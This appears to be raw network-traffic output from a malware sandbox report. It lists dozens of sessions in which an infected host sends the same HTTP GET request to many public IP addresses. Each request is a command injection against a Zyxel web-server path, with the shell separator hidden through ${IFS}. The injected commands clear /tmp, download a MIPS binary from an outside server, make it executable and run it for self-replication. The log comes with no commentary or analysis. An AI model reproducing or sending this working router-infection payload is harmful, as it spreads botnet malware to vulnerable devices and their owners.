                                                Jan 12, 2024 18:16:08.118096113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                802192.168.2.2346964189.154.160.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118175983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                803192.168.2.2353748159.135.52.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118225098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                804192.168.2.234534662.32.249.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118283987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                805192.168.2.2357604101.118.114.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118345022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                806192.168.2.2335378128.189.224.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118411064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                807192.168.2.234188419.144.137.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118472099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                808192.168.2.235278059.137.212.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120085001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                809192.168.2.2355404118.125.251.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120193958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                810192.168.2.235540458.181.164.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120223045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                811192.168.2.235451218.103.210.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120284081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                812192.168.2.233636660.222.54.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120347977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                813192.168.2.2337880197.146.209.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120374918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                814192.168.2.234402691.41.122.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120440006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                815192.168.2.2341730158.188.20.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120443106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                816192.168.2.236099060.240.159.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120510101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                817192.168.2.235155876.75.98.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120513916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                818192.168.2.2336964199.238.156.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120585918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                819192.168.2.234290490.91.193.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120585918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                820192.168.2.2356070197.243.98.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120628119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                821192.168.2.2341502114.22.148.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120687962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                822192.168.2.2352638212.190.131.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120708942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                823192.168.2.2353752207.60.71.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120757103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                824192.168.2.2350882151.174.224.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120784044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                825192.168.2.234627869.109.178.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120805979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                826192.168.2.2345474137.43.224.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120847940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                827192.168.2.236054074.124.122.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120874882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                828192.168.2.234351441.51.216.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.120960951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                829192.168.2.2353064109.0.68.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121011972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                830192.168.2.2354814129.2.85.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121046066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                831192.168.2.234147814.31.225.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121079922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                832192.168.2.2353452116.92.135.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121119022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                833192.168.2.2343934132.187.37.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121160030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                834192.168.2.2335166219.165.88.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121208906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                835192.168.2.2354666163.246.48.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121238947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                836192.168.2.2352564150.119.131.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121277094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                837192.168.2.2343318146.191.127.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121315002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                838192.168.2.2333952139.160.96.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121354103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                839192.168.2.2340418213.60.66.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121396065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                840192.168.2.2338552128.175.33.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121428013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                841192.168.2.235160076.185.36.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121469021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                842192.168.2.2360224126.20.121.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121485949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                843192.168.2.2350110167.250.65.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121529102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                844192.168.2.2349926138.163.57.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121551037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                845192.168.2.235665458.125.250.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121607065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                846192.168.2.2357644108.190.37.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121639013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                847192.168.2.233412898.233.171.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121673107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                848192.168.2.2341362173.62.73.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121707916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                849192.168.2.23494645.251.54.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121761084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                850192.168.2.233283867.159.52.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121802092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                851192.168.2.234899481.224.173.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121803999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                852192.168.2.2345166213.40.68.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121825933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                853192.168.2.2343336130.105.47.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121870995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                854192.168.2.2341392129.223.16.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121922970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                855192.168.2.233374665.179.171.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121953011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                856192.168.2.2344258219.164.1.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.121998072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                857192.168.2.2356132130.134.95.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122052908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                858192.168.2.234087685.121.108.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122070074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                859192.168.2.2352890129.222.2.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122103930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                860192.168.2.2333980123.179.139.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122128963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                861192.168.2.2360442189.55.50.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122206926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                862192.168.2.2358844158.149.244.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122217894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                863192.168.2.2336964190.243.162.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122245073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                864192.168.2.2354658182.98.253.145443
                                                TimestampBytes transferredDirectionData
